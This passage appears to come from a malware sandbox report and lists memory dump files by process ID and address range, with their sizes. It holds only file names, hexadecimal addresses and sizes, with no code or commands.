                                                                                                                                                                                                                              • memory/5212-406-0x0000000005650000-0x00000000056C6000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                472KB

                                                                                                                                                                                                                              • memory/5212-342-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                              • memory/5256-345-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                              • memory/5256-448-0x0000000000400000-0x0000000003302000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                47.0MB

                                                                                                                                                                                                                              • memory/5256-425-0x00000000001C0000-0x00000000001EE000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                184KB

                                                                                                                                                                                                                              • memory/5300-457-0x0000000000400000-0x000000000334A000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                47.3MB

                                                                                                                                                                                                                              • memory/5300-347-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                              • memory/5300-431-0x0000000003350000-0x000000000349A000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                              • memory/5312-356-0x00007FF7332F4060-mapping.dmp
                                                                                                                                                                                                                              • memory/5312-398-0x00000259E0B40000-0x00000259E0BB4000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                464KB

                                                                                                                                                                                                                              • memory/5400-428-0x0000000004880000-0x00000000048B9000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                228KB

                                                                                                                                                                                                                              • memory/5400-352-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                              • memory/5400-410-0x0000000000400000-0x0000000002C86000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                40.5MB

                                                                                                                                                                                                                              • memory/5416-353-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                              • memory/5428-354-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                              • memory/5496-361-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                              • memory/5496-450-0x0000000005650000-0x0000000005651000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                              • memory/5496-412-0x00000000773E0000-0x000000007756E000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                1.6MB

                                                                                                                                                                                                                              • memory/5564-419-0x000000001ADE0000-0x000000001ADE2000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                              • memory/5564-365-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                              • memory/5640-433-0x0000000000400000-0x0000000002CB5000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                40.7MB

                                                                                                                                                                                                                              • memory/5640-415-0x0000000002E50000-0x0000000002EE3000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                588KB

                                                                                                                                                                                                                              • memory/5648-387-0x00000229A1E00000-0x00000229A1E74000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                464KB

                                                                                                                                                                                                                              • memory/5940-408-0x0000000002C70000-0x0000000002DBA000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                              • memory/5940-423-0x0000000000400000-0x0000000002C6C000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                40.4MB